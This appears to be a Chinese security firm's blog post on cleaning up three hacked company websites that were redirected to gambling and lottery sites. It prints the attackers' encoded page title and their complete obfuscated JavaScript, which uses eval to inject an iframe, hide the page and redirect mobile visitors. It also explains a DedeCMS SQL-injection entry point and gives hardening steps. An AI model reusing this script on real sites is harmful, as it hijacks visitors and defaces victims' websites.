網站被黑提醒該站點可能受到黑客攻擊,部分頁面已被非法篡改

大清早的一上班收到3個網站客戶的QQ聯系，說是自己公司的網站被跳轉到了北京sai車，cai票，du博網站上去了，我們SINE安全公司對3個網站進行了詳細的安全檢測，發現這3個客戶的網站都是同樣的症狀，網站首頁檔案index.php,index.html都被篡改添加了惡意的代碼。網站在百度的快照也被更改成了這些cai票，bo彩的内容了，并被百度網址安全中心提醒您：該站點可能受到黑客攻擊，部分頁面已被非法篡改！如下圖所示：

從百度點選網站進去，會直接跳轉到bo彩，du博網站上去，直接輸入3個公司的網站位址是不會跳轉的，點選跳轉的時候會被360攔截掉，提示如下圖：

360安全中心提醒您：未經證明的bo彩du博網站，您通路的網站含有未經證明的境外bo彩或非法du博的相關内容，可能給您造成财産損失，請您謹慎通路。

我們SINE安全技術通過對3個客戶網站的代碼的安全分析，發現都被攻擊者上傳了網站木馬後門，php大馬，以及一句話木馬後門都被上傳到了客戶網站的根目錄下，網站的首頁檔案都被篡改了，包括網站的标題，描述，TDK都被改成了bo彩，cai票，du博的内容，客戶說之前還原了網站首頁檔案，過不了多久還是被篡改，被跳轉，導緻客戶網站在百度的權重直接降級，網站在百度的關鍵詞排名都掉沒了，損失慘重。網站被反複篡改的原因根本是網站代碼存在漏洞，需要對網站漏洞進行修複，以及做好網站安全加強，清除木馬後門才能徹底的解決問題。

我們來看下網站首頁被篡改的症狀：

title keywords deion都被篡改了，内容都是加密的字元：

<title>&#65279&#x5317&#x4eac&#36187&#x8f66&#112&#107&#49&#x30&#32&#80&#x4b&#x31&#x30&#24320&#x5956&#x76f4&#25773&#x20&#21271&#20140&#x8d5b&#36710&#112&#x6b&#49&#x30&#24320&#22870&#x8bb0&#24405&#45&#112&#107&#x31&#x30&#x5f00&#22870&#35270&#39057&#30452&#25773</title>

通過url解密發現這些内容都是北京sai車，北京pk10,pk10北京PK開獎等cai票的網站關鍵詞，簡單來講就是網站的标題内容都被攻擊者改成了cai票，bo彩的标題，利用網站自身在百度的權重，做他們自己的關鍵詞排名。

網站被跳轉的代碼也被我們SINE安全技術找了出來，如下：

function goPAGE() {if((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "rgyh2"} else {var ss = '<center id="yangchen"><ifr' + 'ame scrolling="no" marginheight=0 marginwidth=0 frameborder="0" width="100%" width="14' + '00" height="8' + '50" src="att=rgyh8"></iframe></center>'; eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); try { setInterval(function() { try { document.getElementById("div" + "All").style.display = "no" + "ne" } catch (e) {} for (var i = 0; i < document.body.children.length; i++) { try { var tagname = document.body.children[i].tagName; var myid = document.body.children[i].id;if (myid != "iconDiv1" && myid != "yangchen") {document.body.children[i].style.display = "non" + "e" } } catch (e) {} } }, 100)} catch (e) {}}}goPAGE();

知道問題的所在，以及網站被攻擊的症狀，那麼該如何解決問題？

首先登陸客戶網站的伺服器，打包壓縮客戶的網站代碼下載下傳到我們本地的工作電腦，對其進行詳細的安全檢測，以及網站漏洞檢測，網站木馬後門檢測，以及網站日志下載下傳分析，發現其中一個網站使用的是dedecms系統開發網站，網站存在sql注入漏洞，導緻網站的管理者賬号密碼被sql注入擷取到，預設的管理者背景位址dede沒有改，導緻攻擊者直接登入背景上傳了木馬到網站裡了。針對dedecms的sql注入漏洞進行了修複，清除掉網站存在的木馬後門，對網站安全進行加強問題得以解決。

對dedecms的目錄安全權限進行設定 /data目錄取消腳本執行權限，給與寫入權限，templets模闆檔案夾也是同樣的安全部署，取消php腳本的執行權限，開啟寫入權限，dede背景的目錄給隻讀權限，uploads上傳目錄給寫入，取消php腳本權限。

至此客戶網站首頁被篡改的問題得以解決，百度的攔截也是需要去除的，清除惡意連結代碼，修複網站漏洞，防止以後網站被篡改，做好網站安全後，再送出給百度安全中心人工稽核，就可以解除百度的攔截，如果您對網站漏洞修複不熟悉的話，可以找我們SINE安全來修複網站漏洞，解決百度攔截。